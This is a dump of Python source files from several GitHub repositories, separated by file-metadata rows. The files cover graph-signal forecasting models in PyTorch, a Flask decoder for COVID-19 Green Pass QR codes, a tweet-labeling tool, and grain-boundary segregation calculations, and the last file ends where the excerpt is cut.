fit: build dataloader for training data
Args:
train_data (numpy array): train data
sample_label (bool, optional): If labels should be sampled for a semisupervised
learning. Defaults to True.
batch_size (int, optional): batch size. Defaults to 40.
shuffle (bool, optional): If samples should be shuffled. Defaults to True.
Returns:
pytorch Dataloader: train data prepared for training
"""
train_X, train_y = PrepareSequence(train_data, seq_len = self.seq_len, pred_len = self.pred_len)
if self.gft:
train_data_freqs = Preprocessing_GFT(train_data[:,self.sample],self.sample, self.V , self.freqs )
train_X_freqs, _ = PrepareSequence(train_data_freqs, seq_len = self.seq_len, pred_len = self.pred_len)
train_X = np.concatenate((train_X[:,:,self.sample], train_X_freqs), axis=-1)
if sample_label:
train_y = train_y.T[self.sample]
train_y = train_y.T
return Dataloader(train_X, train_y, batch_size, shuffle)
def transform(self, data, sample_label = True, batch_size=40,shuffle=True):
"""
transform: build dataloader for validation and test data
Args:
train_data (numpy array): train data
sample_label (bool, optional): If validation labels should be sampled for a
semisupervised learning. Defaults to True.
batch_size (int, optional): batch size. Defaults to 40.
shuffle (bool, optional): If samples should be shuffled. Defaults to True.
Returns:
pytorch Dataloader: train data prepared for training
"""
X, y = PrepareSequence(data, seq_len = self.seq_len, pred_len = self.pred_len)
if self.gft:
data_freqs = Preprocessing_GFT(data[:,self.sample],self.sample, self.V , self.freqs)
X_freqs, _ = PrepareSequence(data_freqs, seq_len = self.seq_len, pred_len = self.pred_len)
X = np.concatenate((X[:,:,self.sample], X_freqs), axis=-1)
if sample_label:
y = y.T[self.sample]
y = y.T
return Dataloader(X, y, batch_size, shuffle)
| Python | 154 | 38.006493 | 137 | /data/Dataloader.py | 0.607593 | 0.600298 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | import os
import sys
current_dir = os.path.split(os.path.dirname(os.path.realpath(__file__)))[0]
sys.path.append(os.path.join(current_dir, 'data'))
print(sys.path) | Python | 6 | 26.5 | 75 | /main/__init.py | 0.72561 | 0.719512 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | from setuptools import setup, find_packages
setup(
name='Joint-Forecasting-and-Interpolation-of-Graph-Signals-Using-Deep-Learning',
version='0.1.0',
author='Gabriela Lewenfus',
author_email='gabriela.lewenfus@gmail.com',
packages=find_packages(),
install_requires = ['scipy>=1.4.1', 'pandas>=0.15', 'scikit-learn>=0.22', 'numpy>=0.46'],
description='Code from the paper Joint Forecasting and Interpolation of Graph Signals Using Deep Learning',
) | Python | 12 | 35.666668 | 110 | /setup.py | 0.703872 | 0.669704 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | ### training code ####
import sys
import time
import numpy as np
import torch
from torch.autograd import Variable
toolbar_width=20
def Train(model, train_dataloader, valid_dataloader, learning_rate = 1e-5, epochs = 300, patience = 10,
verbose=1, gpu = True, sample = None, optimizer = 'rmsprop'):
if optimizer == 'rmsprop':
optimizer = torch.optim.RMSprop(model.parameters(), lr = learning_rate)
elif optimizer == 'adam':
optimizer = torch.optim.Adam(model.parameters(), lr = learning_rate )
loss_MSE = torch.nn.MSELoss()
loss_L1 = torch.nn.L1Loss()
batch_size = train_dataloader.batch_size
if gpu: device='cuda'
else: device= 'cpu'
losses_epochs_train = []
losses_epochs_valid = []
time_epochs = []
time_epochs_val = []
is_best_model = 0
patient_epoch = 0
scheduler = model.schedule(optimizer)
for epoch in range(epochs):
pre_time = time.time()
try:
data_size=train_dataloader.dataset.data_size
except: pass
try:
data_size=train_dataloader.dataset.tensors[0].shape[0]
except: pass
n_iter=data_size/train_dataloader.batch_size
if verbose:
count=0
checkpoints=np.linspace(0,n_iter,toolbar_width).astype(np.int16)
text='Epoch {:02d}: '.format(epoch)
sys.stdout.write(text+"[%s]" % (" " * toolbar_width))
sys.stdout.flush()
sys.stdout.write("\b" * (toolbar_width+1))
losses_train = []
losses_valid = []
for data in train_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
model.zero_grad()
outputs = model(inputs.to(device))
outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
loss_train = model.loss(outputs,y)
losses_train.append(loss_train.cpu().data.numpy())
optimizer.zero_grad()
loss_train.backward()
optimizer.step()
if verbose:
if count in checkpoints:
sys.stdout.write('=')
sys.stdout.flush()
count+=1
for param_group in optimizer.param_groups:
learning_rate = param_group['lr']
if learning_rate >1e-5:
scheduler.step()
time_epochs.append(time.time()-pre_time)
pre_time = time.time()
losses_valid = []
for data in valid_dataloader:
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
outputs= model(inputs.to(device))
outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
losses_valid.append(model.loss(outputs, y).cpu().data.numpy())
time_epochs_val.append(time.time()-pre_time)
losses_epochs_train.append(np.mean(losses_train))
losses_epochs_valid.append(np.mean(losses_valid))
avg_losses_epoch_train = losses_epochs_train[-1]
avg_losses_epoch_valid = losses_epochs_valid[-1]
if avg_losses_epoch_valid >100000000000:
print("Diverged")
return (None,None)
if epoch == 0:
is_best_model = True
best_model = model
min_loss = avg_losses_epoch_valid
else:
if min_loss - avg_losses_epoch_valid > 1e-6:
is_best_model = True
best_model = model
min_loss = avg_losses_epoch_valid
patient_epoch = 0
else:
is_best_model = False
patient_epoch += 1
if patient_epoch >= patience:
print('Early Stopped at Epoch:', epoch)
break
if verbose:
sys.stdout.write("]")
print(' train loss: {}, valid loss: {}, time: {}, lr: {}'.format( \
np.around(avg_losses_epoch_train, 6),\
np.around(avg_losses_epoch_valid, 6),\
np.around([time_epochs[-1] ] , 2),\
learning_rate) )
return best_model, [losses_epochs_train ,
losses_epochs_valid ,
time_epochs ,
time_epochs_val ]
def Evaluate(model, dataloader, scale=1, pred_len = 1, gpu = True):
batch_size = dataloader.batch_size
pre_time = time.time()
gpu = torch.cuda.is_available()
if gpu: device='cuda'
else: device= 'cpu'
losses_mse = []
losses_l1 = []
losses_mape = []
for i,data in enumerate(dataloader):
inputs, labels = data
if inputs.shape[0] != batch_size:
continue
outputs = model(inputs.to(device))
outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
loss_mse = torch.nn.MSELoss()(outputs*scale, y*scale).cpu().data
loss_l1 = torch.nn.L1Loss()(outputs*scale, y*scale).cpu().data
outputs = outputs.cpu().data.numpy()
y = y.cpu().data.numpy()
outputs = outputs*scale
y = y*scale
abs_diff = np.abs((outputs-y))
abs_y = np.abs(y)
abs_diff=abs_diff[abs_y>1]
abs_y=abs_y[abs_y>1]
loss_mape = abs_diff/abs_y
loss_mape = np.mean(loss_mape)*100
losses_mse.append(loss_mse)
losses_l1.append(loss_l1)
losses_mape.append(loss_mape)
losses_l1 = np.array(losses_l1)
losses_mse = np.array(losses_mse)
mean_l1 = np.mean(losses_l1, axis = 0)
rmse = np.mean(np.sqrt(losses_mse))
print('Test: MAE: {}, RMSE : {}, MAPE : {}'.format(mean_l1, rmse,np.mean(losses_mape)))
return [losses_l1, losses_mse, mean_l1, np.mean(losses_mape), time.time()-pre_time]
### modified from https://github.com/zhiyongc/Graph_Convolutional_LSTM/blob/master/Code_V2/HGC_LSTM%20%26%20Experiments.ipynb | Python | 194 | 30.597939 | 125 | /pytorch_gsp/train/train_rnn.py | 0.539077 | 0.526187 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | import torch.utils.data as utils
import torch.nn.functional as F
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn.parameter import Parameter
import numpy as np
import pandas as pd
import time
from pytorch_gsp.utils.gsp import (spectral_components, Reconstruction)
class SpectralGraphForecast(nn.Module):
"""
SpectralGraphForecast
Args:
V (numpy array): eingenvectors matrix graph signal processing model (i.e.: Laplacian matrix of the graph)
sample (numpy array): indices of in sample nodes
freqs (numpy array): frequency components to be used in interpolation
rnn (str, optional): predictive model: lstm, gru, 1dconv. Defaults to 'gru'.
"""
def __init__(self, V, sample,freqs, rnn = 'gru'):
super(SpectralGraphForecast, self).__init__()
self.N = V.shape[0] # number of nodes in the entire graph
self.d = len(freqs) # number of frequencies
self.n = len(sample) # number of samples
self.sample = sample
if rnn == 'gru':
self.srnn = nn.GRU(self.d,self.d,1, batch_first=True)
self.rnn =nn.GRU(self.n,self.n,1, batch_first=True)
elif rnn == 'lstm':
self.srnn = nn.LSTM(self.d,self.d,1, batch_first=True)
self.rnn =nn.LSTM(self.n,self.n,1, batch_first=True)
elif rnn == '1dconv':
self.srnn = nn.Conv1d(self.d,self.d,1, batch_first=True)
self.rnn =nn.Conv1d(self.n,self.n,1, batch_first=True)
if self.n != self.N:
self.interpolate = Reconstruction(V,sample,freqs, domain='spectral')
self.interpolate2 = Reconstruction(V,sample,freqs, domain='vertex')
self.linear = nn.Linear(self.N*2,self.N)
def forward(self, input):
x = input[:,:,:self.n]
x_hat = input[:,:,self.n:]
bz, seq_len, _ = x.size()
x_hat = self.srnn(x_hat)[0][:,-1,:]
if self.n != self.N:
xtilde = self.interpolate(x_hat).unsqueeze(1)
else:
xtilde = x_hat.unsqueeze(1)
x = self.rnn(x)[0][:,-1,:]
if self.n != self.N:
x1 = self.interpolate2(x)
x1[:,self.sample] = x
else:
x1 = x
x1 = x1.unsqueeze(1)
x1 = torch.cat((xtilde,x1),dim = 1).reshape((bz, self.N*2))
return self.linear(x1)
class SpectralGraphForecast2(nn.Module):
"""
SpectralGraphForecast2: combination of predictive models in both spectral and vertex domains
Args:
V (numpy array): eingenvectors matrix graph signal processing model (i.e.: Laplacian matrix of the graph)
sample (numpy array): indices of in sample nodes
freqs (numpy array): frequency components to be used in interpolation
rnn (str, optional): predictive model: lstm, gru, . Defaults to 'gru'.
"""
def __init__(self, V, sample,freqs, rnn = 'gru'):
super(SpectralGraphForecast2, self).__init__()
self.N = V.shape[0]
self.d = len(freqs)
self.n = len(sample)
self.sample = sample
if rnn == 'gru':
self.srnn = nn.GRU(self.d,self.d,1, batch_first=True)
self.rnn =nn.GRU(self.n,self.n,1, batch_first=True)
elif rnn == 'lstm':
self.srnn = nn.LSTM(self.d,self.d,1, batch_first=True)
self.rnn =nn.LSTM(self.n,self.n,1, batch_first=True)
if self.n != self.N:
self.interpolate = Reconstruction(V,sample,freqs, domain='sprctral')
self.interpolate2 = Reconstruction(V,sample,freqs, domain='vertex')
self.w = Parameter(torch.Tensor(self.N), requires_grad=True)
self.w.data.fill_(0.01)
def forward(self, input):
x = input[:,:,:self.n]
x_hat = input[:,:,self.n:]
bz, seq_len, _ = x.size()
x_hat = self.srnn(x_hat)[0][:,-1,:]
if self.n != self.N:
xtilde = self.interpolate(x_hat)
else:
xtilde = x_hat
x = self.rnn(x)[0][:,-1,:]
if self.n != self.N:
x1 = self.interpolate2(x)
return torch.tanh(self.w)*xtilde + (1-torch.tanh(self.w))*x1
class model(nn.Module):
def __init__(self, V, sample,freqs, layer, supervised = True, l1=0,l2=0, schedule_step=10):
"""
model: model class to use the SpectralGraphForecast layer
Args:
V (numpy array): eingenvector matrix graph from signal processing model (i.e.: Laplacian matrix of the graph)
sample (numpy array): indices of in sample nodes
freqs (numpy array): frequency components to be used in interpolation
layer (nn.Module): SpectralGraphForecast layer
"""
super(model, self).__init__()
self.N = V.shape[0]
self.d = len(freqs)
self.n = len(sample)
self.supervised = supervised
self.sample = sample
self.layer = layer
self.l1 = l1
self.l2 = l2
self.schedule_step = schedule_step
if not supervised:
self.interpolate = Reconstruction(V,sample,freqs, domain='vertex')
def forward(self, input):
return self.layer(input)
def loss(self,out,y):
assert (self.l1+self.l2 <=1)
assert(self.l1>=0)
assert(self.l2>=0)
regularization_loss = 0
if self.l1 != 0:
regularization_loss += self.l1*torch.nn.L1Loss()(y[:,self.sample],out[:,self.sample])
if self.l2 != 0:
regularization_loss += self.l2*torch.norm(y[:,self.sample]-out[:,self.sample])
if not self.supervised:
ys = y
y = self.interpolate(ys)
y[:,self.sample] = ys
return torch.nn.MSELoss()(y,out) + regularization_loss
def schedule(self,opt):
for param_group in opt.param_groups:
learning_rate = param_group['lr']
if learning_rate > 1e-5:
lamb = lambda epoch: 0.5 if epoch%10 == 0 else 1
else: lamb = lambda epoch: 1 if epoch%10 == 0 else 1
return torch.optim.lr_scheduler.MultiplicativeLR(opt, lr_lambda=[lamb])
class model2(nn.Module):
def __init__(self, V, sample,freqs, layer,l1=0,l2=0,schedule_step=10, supervised = True, unsqueeze=False):
super(model2, self).__init__()
"""
model2: interepolates the signal before running the layer.
Args:
V (numpy array): eingenvector matrix graph from signal processing model (i.e.: Laplacian matrix of the graph)
sample (numpy array): indices of in sample nodes
freqs (numpy array): frequency components to be used in interpolation
layer (nn.Module): layer
"""
self.N = V.shape[0]
self.d = len(freqs)
self.n = len(sample)
self.supervised = supervised
self.sample = sample
self.unsqueeze = unsqueeze
self.layer = layer
self.l1 = l1
self.l2 = l2
self.schedule_step = schedule_step
self.interpolate2 = Reconstruction(V,sample,freqs, domain='vertex')
if not supervised:
self.interpolate = Reconstruction(V,sample,freqs, domain='vertex')
self.linear = torch.nn.Linear(self.N,self.N)
def forward(self, input):
bz, seq_len, N = input.size()
if self.unsqueeze:
x = input.unsqueeze(dim=1)
x = self.layer(input)
if N < self.N:
x1 = self.interpolate2(x)
x1[:,self.sample] = x
else: x1 = x
return x1
def loss(self,out,y):
assert (self.l1+self.l2 <1)
assert(self.l1>=0)
assert(self.l2>=0)
regularization_loss = 0
if self.l1 != 0:
regularization_loss += self.l1*torch.nn.L1Loss()(y[:,self.sample],out[:,self.sample])
if self.l2 != 0:
regularization_loss += self.l2*torch.norm(y[:,self.sample]-out[:,self.sample])
if not self.supervised:
ys = y
y = self.interpolate(ys)
y[:,self.sample] = ys
return torch.nn.MSELoss()(y,out) + regularization_loss
def schedule(self,opt):
for param_group in opt.param_groups:
learning_rate = param_group['lr']
if learning_rate > 1e-5:
lamb = lambda epoch: 1/2 if epoch%self.schedule_step == 0 else 1
else: lamb = lambda epoch: 1 if epoch%5 == 0 else 1
return torch.optim.lr_scheduler.MultiplicativeLR(opt, lr_lambda=[lamb])
| Python | 242 | 34.884296 | 117 | /pytorch_gsp/models/sggru.py | 0.568747 | 0.553086 |
sciaso/greenpass-covid19-qrcode-decoder | refs/heads/master | from pyzbar.pyzbar import decode
from PIL import Image
from base45 import b45decode
from zlib import decompress
from flynn import decoder as flynn_decoder
from lib.datamapper import DataMapper as data_mapper
class GreenPassDecoder(object):
stream_data = None
def __init__(self, stream_data):
self.stream_data = decode(Image.open(stream_data))[0].data
def decode(self, schema):
qr_decoded = self.stream_data[4:]
qrcode_data = decompress(b45decode(qr_decoded))
(_, (header_1, header_2, cbor_payload, sign)) = flynn_decoder.loads(qrcode_data)
data = flynn_decoder.loads(cbor_payload)
dm = data_mapper(data, schema)
return dm.convert_json()
| Python | 21 | 32.761906 | 88 | /lib/greenpass.py | 0.693935 | 0.679831 |
sciaso/greenpass-covid19-qrcode-decoder | refs/heads/master | import json
from urllib.request import urlopen
class DataMapperError(Exception):
pass
class DataMapper:
qr_data = None
schema = None
json = ''
new_json = {}
def _save_json(self, data, schema, level=0):
for key, value in data.items():
try:
description = schema[key].get('title') or schema[key].get('description') or key
description, _, _ = description.partition(' - ')
if type(value) is dict:
self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong></p>'
_, _, sch_ref = schema[key]['$ref'].rpartition('/')
self._save_json(value, self.schema['$defs'][sch_ref]['properties'], level + 1)
elif type(value) is list:
self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong></p>'
_, _, sch_ref = schema[key]['items']['$ref'].rpartition('/')
for v in value:
self._save_json(v, self.schema['$defs'][sch_ref]['properties'], level + 1)
else:
self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong>' + ':' + str(
value) + '</p>'
except KeyError:
print('error keys')
print(data)
def __set_schema(self, schema_url):
sch = urlopen(schema_url)
self.schema = json.load(sch)
def __init__(self, qr_data, schema_url, params_string=False):
i = -260
j = 1
if params_string:
i = str(i)
j = str(j)
self.json = ''
self.qr_data = qr_data[i][j]
self.__set_schema(schema_url)
def convert_json(self):
if self.qr_data is None:
raise DataMapperError("QR_DATA_IS_WRONG")
if self.schema is None:
raise DataMapperError("SCHEMA_IS_WRONG")
self._save_json(self.qr_data, self.schema['properties'])
return self.json
| Python | 61 | 34.229507 | 117 | /lib/datamapper.py | 0.470451 | 0.467194 |
sciaso/greenpass-covid19-qrcode-decoder | refs/heads/master | from flask import Flask, redirect, request, render_template
from os.path import splitext
from flask_sslify import SSLify
from flask_babel import Babel, gettext
import os
from lib.greenpass import GreenPassDecoder as greenpass_decoder
is_prod = os.environ.get('PRODUCTION', None)
ga_id = os.environ.get('GA_ID', None)
sharethis_script_src = os.environ.get('SHARETHIS_SCRIPT_SRC', None)
app_url = os.environ.get('APP_URL', None)
app = Flask(__name__)
app.config['BABEL_DEFAULT_LOCALE'] = 'en'
app.config['MAX_CONTENT_LENGTH'] = 4096 * 1024
app.config['UPLOAD_EXTENSIONS'] = ['.jpg', '.png', '.jpeg']
app.config['GITHUB_PROJECT'] = 'https://github.com/debba/greenpass-covid19-qrcode-decoder'
app.config[
'DCC_SCHEMA'] = 'https://raw.githubusercontent.com/ehn-dcc-development/ehn-dcc-schema/release/1.3.0/DCC.combined-schema.json'
app.glb_schema = {}
app.converted_schema = ''
app.config['LANGUAGES'] = {
'en': 'English',
'it': 'Italiano'
}
babel = Babel(app)
@babel.localeselector
def get_locale():
return request.accept_languages.best_match(app.config['LANGUAGES'].keys())
if is_prod:
sslify = SSLify(app)
@app.context_processor
def inject_user():
return dict(github_project=app.config['GITHUB_PROJECT'], is_prod=is_prod, ga_id=ga_id,
sharethis_script_src=sharethis_script_src, app_url=app_url,
app_name=gettext('Green Pass COVID-19 QRCode Decoder'))
@app.route('/', methods=['GET'])
def home():
return render_template('home.html')
@app.route('/qrdata', methods=['GET', 'POST'])
def qrdata():
if request.method == 'POST':
if request.files['image'].filename != '':
app.converted_schema = ''
image = request.files['image']
filename = image.filename
file_ext = splitext(filename)[1]
if filename != '':
if file_ext not in app.config['UPLOAD_EXTENSIONS']:
return render_template('error.html', error='UPLOAD_EXTENSIONS_ERROR', file_ext=file_ext), 400
try:
decoder = greenpass_decoder(image.stream)
return render_template('data.html', data=decoder.decode(app.config['DCC_SCHEMA']))
except (ValueError, IndexError) as e:
print(e)
return render_template('error.html', error='UPLOAD_IMAGE_NOT_VALID'), 400
return render_template('error.html', error='UPLOAD_IMAGE_WITH_NO_NAME'), 500
else:
return redirect('/') | Python | 72 | 33.569443 | 129 | /app.py | 0.6459 | 0.635852 |
kaustavbhattacharjee/labeling | refs/heads/main | # This is a sample Python script.
# Press ⌃R to execute it or replace it with your code.
# Press Double ⇧ to search everywhere for classes, files, tool windows, actions, and settings.
from utils import Tweet
def print_hi(name):
# Use a breakpoint in the code line below to debug your script.
print(f'Hi, {name}') # Press ⌘F8 to toggle the breakpoint.
# Press the green button in the gutter to run the script.
if __name__ == '__main__':
print_hi('Start Labeling')
# See PyCharm help at https://www.jetbrains.com/help/pycharm/
#PATH = "Jun/test.csv"
PATH = "Kebby/MarchNonExpertsManualLabel3.csv" #first save the .xlsx file as .csv
tweet = Tweet()
tweets = tweet.import_data(PATH, "csv")
tweets_labeled = tweet.create_labels(tweets)
tweet.save_labels(tweets_labeled, PATH, "csv", index=False)
| Python | 23 | 34.217392 | 94 | /main.py | 0.714815 | 0.712346 |
kaustavbhattacharjee/labeling | refs/heads/main | import pandas as pd
import csv
import os
from pandas import ExcelWriter
class Tweet:
def import_data(self, PATH, type):
if type == "xlsx":
xl = pd.ExcelFile(PATH)
data = xl.parse("Sheet1")
if type == "csv":
data = pd.read_csv(PATH)
# if type == "csv":
# with open(PATH, newline='') as f:
# reader = csv.reader(f)
# data = list(reader)
return data
def label_key2char(self, key):
"""
:param num: the input x,y,z from keyboard
:return: fact, opinion, anti-fact, if other than x,y,z return ""
"""
if key == "0":
return "fact"
elif key == "1":
return "opinion"
elif key == "2":
return "misinformation"
else:
return ""
def create_labels(self, df):
"""
:param df: imported data in dataframe format
:return: dataframe with added label in ManualLabel column
"""
labels = df["ManualLabel"].tolist()
for index, row in df.iterrows():
if pd.isna(row["ManualLabel"]):
print("===========")
print("Tweet Text")
print(row["Tweet Text"])
print("===========")
print("Row Number: "+ str(index))
print("Subjective: " + str(row["SubjectivityScores"]))
print("Sentiment: " + str(row["FlairSentimentScore"]) + " " + str(row["FlairSentiment"]))
print("===========")
print('Classify as fact(0), opinion(1), misinformation(2) OR Skip(s), Quit(q): ')
print("Your Label:")
getch = _Getch()
label = getch()
label_char = self.label_key2char(label)
os.system('cls' if os.name == 'nt' else 'clear')
if label == "q":
break
labels[index] = label_char
else:
continue
df.drop(columns=["ManualLabel"], inplace=True)
df["ManualLabel"] = labels
return df
def save_labels(self, tweets_labeled, PATH, type, index):
df = tweets_labeled
if type == "xlsx":
writer = ExcelWriter(PATH)
df.to_excel(writer, 'Sheet1', index=index)
writer.save()
if type == "csv":
df.to_csv(PATH, index=index)
class _Getch:
"""Gets a single character from standard input. Does not echo to the
screen."""
def __init__(self):
try:
self.impl = _GetchWindows()
except ImportError:
self.impl = _GetchUnix()
def __call__(self): return self.impl()
class _GetchUnix:
def __init__(self):
import tty, sys
def __call__(self):
import sys, tty, termios
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
class _GetchWindows:
def __init__(self):
import msvcrt
def __call__(self):
import msvcrt
return msvcrt.getch()
| Python | 110 | 28.799999 | 105 | /utils.py | 0.494968 | 0.491613 |
dspearot/Embrittling-Estimator | refs/heads/main | # ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# This code is a supplement for the journal article titled:
# "Spectrum of Embrittling Potencies and Relation to Properties of
# Symmetric-Tilt Grain Boundaries"
# ------------------
# This code performs the following tasks:
# 1) Obtains density of states from the previous step
# 2) Calculates Xi and Pi (check the paper for definitions) at the population
# level (Fig.4)
# 3) Write Xi and Pi calculated in this step to a data frame, to be processed
# at the sample level
# --- Definitions and Abbreviations --
# GB: Grain boundary
# FS: Free surface
# ------------------
# Authors: Doruk Aksoy (1), Rémi Dingreville (2), Douglas E. Spearot (1,*)
# (1) University of Florida, Gainesville, FL, USA
# (2) Center for Integrated Nanotechnologies, Sandia National Laboratories,
# Albuquerque, NM, USA
# (*) dspearot@ufl.edu
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
#%% Imports
import numpy as np
import pandas as pd
# %% Define functions
def calcXtot(delta_E_seg_GB_i,Fi,X_bulk):
'''
Calculate total solute concentration from bulk solute concentration.
Parameters
----------
X_bulk : Bulk solute concentration
delta_E_seg_GB_i : All segregation energies for each site type i
Fi : Density of states for each site type within the population
Returns
-------
X_tot : Total solute concentration within the population
'''
# Number of site types
n_site_types = np.size(Fi,axis=0)
# Initialize and calculate the probability distribution function for each
# site type i with the given bulk concentration
Xi_with_bulk = np.zeros(n_site_types)
for i in range(n_site_types): Xi_with_bulk[i] = 1 / (1 + ((1 - X_bulk) / X_bulk) * np.exp( delta_E_seg_GB_i[i] / (kB * T)))
# Calculate the effective solute concentration
X_bar = np.sum(Fi * Xi_with_bulk)
# Return the total solute concentration
return ((1 - f_int) * X_bulk + f_int * X_bar)
def fromXtotToXbulk(delta_E_seg_GB_i,Fi,X_tot,tol):
'''
Calculate bulk solute concentration from total solute concentration using
midpoint trial and improvement solver.
Parameters
----------
delta_E_seg_GB_i : All segregation energies for each site type i
Fi : Density of states for each site type
X_tot : Total solute concentration
tol : Tolerance
Returns
-------
If a result is found, return X_bulk.
'''
# Initial lower and upper estimates
x_lo = 0.0
x_hi = X_tot*2
# Initial guess
x_0 = (x_lo + x_hi)/2
# Calculate a trial value using calcXtot function
X_tot_trial = calcXtot(delta_E_seg_GB_i,Fi,x_0)
# Initialize iteration counter
iter_count = 0
# Maximum number of iterations
max_iter = 100
# Check if the result is within the tolerance and number of iterations
# is less than the maximum value
while((np.abs(X_tot_trial - X_tot) > tol) and (iter_count < max_iter)):
if(X_tot_trial > X_tot):
x_hi = x_0
x_0 = (x_hi + x_lo)/2 # Next guess
else:
x_lo = x_0
x_0 = (x_hi + x_lo)/2 # Next guess
# Calculate the new trial value using calcXtot function
X_tot_trial = calcXtot(delta_E_seg_GB_i,Fi,x_0)
# Increment the iteration counter
iter_count +=1
# Check whether a total solute concentration can be found
if (iter_count == max_iter):
print("Could not find a value.")
return (0)
else:
return (x_0)
def calcPopProp(delta_E_seg_GB_i,Fi,X_tot):
'''
Calculate population properties.
Parameters
----------
delta_E_seg_GB_i : All segregation energies for each site type i
Fi : Density of states for each site type
X_tot : Total solute concentration
Returns
-------
X_bulk : Bulk solute concentration
Xi : Fraction of occupied type i sites
Pi : Solute occupancy density
X_bar : Effective solute concentration
delta_E_bar_seg_GB_i : Effective segregation energy per site type i
delta_E_bar_seg_GB : Total effective segregation energy
'''
# Calculate the bulk concentration using fromXtotToXbulk function
X_bulk = fromXtotToXbulk(delta_E_seg_GB_i,Fi,X_tot,1E-4)
# Raise an exception if a bulk solute concentration cannot be calculated with given total solute concentration
if (X_bulk==0):
raise Exception('Error: Cannot calculate a bulk solute concentration with given total solute concentration.')
# Calculate the site specific probability distribution function and convert it to numpy array
Xi = [(1/(1+ ((1-X_bulk)/X_bulk) * np.exp( delta_E_seg_GB_i[i] / (kB*T)))) for i in range(np.size(delta_E_seg_GB_i))]
Xi = np.array(Xi)
# Site occupancy
Pi = Fi * Xi
# Effective solute concentration
X_bar = np.sum(Pi)
# Effective segregation energy for each site type i
delta_E_bar_seg_GB_i = (1/(X_bar*(1-X_bar))) * (Fi * delta_E_seg_GB_i * Xi * (1-Xi))
# Effective segregation energy
delta_E_bar_seg_GB = np.sum(delta_E_bar_seg_GB_i)
# Return all calculated properties
return (X_bulk,Xi,Pi,X_bar,delta_E_bar_seg_GB_i,delta_E_bar_seg_GB)
# %% MAIN
# Read-in normalized density of states (Format: Index/Energies/Frequencies)
df_Fi_GB = pd.read_csv("../Results/Fi_GB.csv",index_col = 0)
# Segregation energies for each site type i
delta_E_seg_GB_i = np.array(df_Fi_GB['Energy'])
# Density of states
Fi = np.array(df_Fi_GB['Freq'])
# %% Variables
# Total solute concentration
X_tot = 15/100 # no of solute atoms/no of GB atoms
# Fraction of interface sites to all segregation sites
f_int = 0.162
# Boltzmann Constant in eV K-1
kB = 0.00008617333262
# Temperature
T = 300 # K
# %% Calculate properties corresponding to the GB population using calcPopProp function
(X_bulk,Xi,Pi,X_bar,delta_E_bar_seg_GB_i,delta_E_bar_seg_GB) = calcPopProp(delta_E_seg_GB_i,Fi,X_tot)
# %% Create a data frame with the population properties
df_Pop = pd.DataFrame(np.transpose([delta_E_seg_GB_i, Fi, Xi, Pi]),columns=['delta_E_seg_GB_i','Fi','Xi','Pi']).astype(float)
# Convert data frame to csv
df_Pop.to_csv("../Results/Pop.csv")
| Python | 167 | 36.946106 | 127 | /Scripts/Population.py | 0.61147 | 0.6004 |
dspearot/Embrittling-Estimator | refs/heads/main | # ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
# This code is a supplement for the journal article titled:
# "Spectrum of Embrittling Potencies and Relation to Properties of
# Symmetric-Tilt Grain Boundaries"
# ------------------
# This code performs the following tasks:
# 1) Reads in Fi, Xi, Pi from the previous step
# 2) Calculates site-specific properties that are shown in Table 2 and Fig. 6
# 3) Calculates collective-behavior properties that are shown in Table 3 and Fig. 5
# 4) Generates all data frames for plotting
# --- Definitions and Abbreviations --
# GB: Grain boundary
# FS: Free surface
# ------------------
# Authors: Doruk Aksoy (1), Rémi Dingreville (2), Douglas E. Spearot (1,*)
# (1) University of Florida, Gainesville, FL, USA
# (2) Center for Integrated Nanotechnologies, Sandia National Laboratories,
# Albuquerque, NM, USA
# (*) dspearot@ufl.edu
# ---------------------------------------------------------------------------
# ---------------------------------------------------------------------------
#%% Imports
import numpy as np
import pandas as pd
from os import listdir,path
# %% Define functions
def getNumOfAtoms(file_path, file_name):
'''
Obtain number of atoms from the file.
Parameters
----------
file_path : File path
file_name : Name of the file
Returns
-------
Number of atoms
'''
with open(path.join(file_path,file_name), 'r') as atoms_file:
# Number of atoms is equal to number of lines without the header
lineCount = 0
for line in atoms_file:
lineCount += 1
return int(lineCount)-1
def getEnergies(file_path, file_name, arr):
'''
Function to obtain energies from file
Parameters
----------
file_path : File path
file_name : Name of the file
arr : Array to write energies
'''
with open(path.join(file_path,file_name), 'r') as results_file:
for ind,line in enumerate(results_file):
# Skip the header
if "#" not in line:
line = line.split()
for j in range(int(np.size(line))):
arr[int(ind)-1,j] = line[j]
def segEngOcc(energies,col_num,NDIGITS):
'''
Function to obtain energies from file
Parameters
----------
energies : Energies obtained from simulations
col_num : Segregation energy column number
NDIGITS : Number of digits to consider when looking at unique segregation
energies
Returns
-------
DE_seg_i_GB : Segregation energy of site type i
N_hat_i_GB : Number of occurences of the segregation energy of site type i
num_site_types : Total number of unique site types
site_type_ind : Indices of matching energies between DE_seg_i_GB array and energies array
'''
# Round energies by the given number of digits, and then find number of unique energies and number of occurences
DE_seg_i_GB,N_hat_i_GB = np.unique(np.round(energies[np.nonzero(energies[:,col_num]),col_num],NDIGITS), return_counts=True)
# Number of site types
num_site_types = int(np.size(DE_seg_i_GB))
# We will use the site_type_ind list to match the site types between GBs and FSs.
site_type_ind = []
# Now that we have matched the rounded energies, find originals and put back into DE_seg_i_GB array
for i in range(num_site_types):
site_type_ind.append(np.where(np.round(energies[np.nonzero(energies[:,col_num]),col_num],NDIGITS) == DE_seg_i_GB[i])[1][0])
DE_seg_i_GB[i] = energies[site_type_ind[i],col_num]
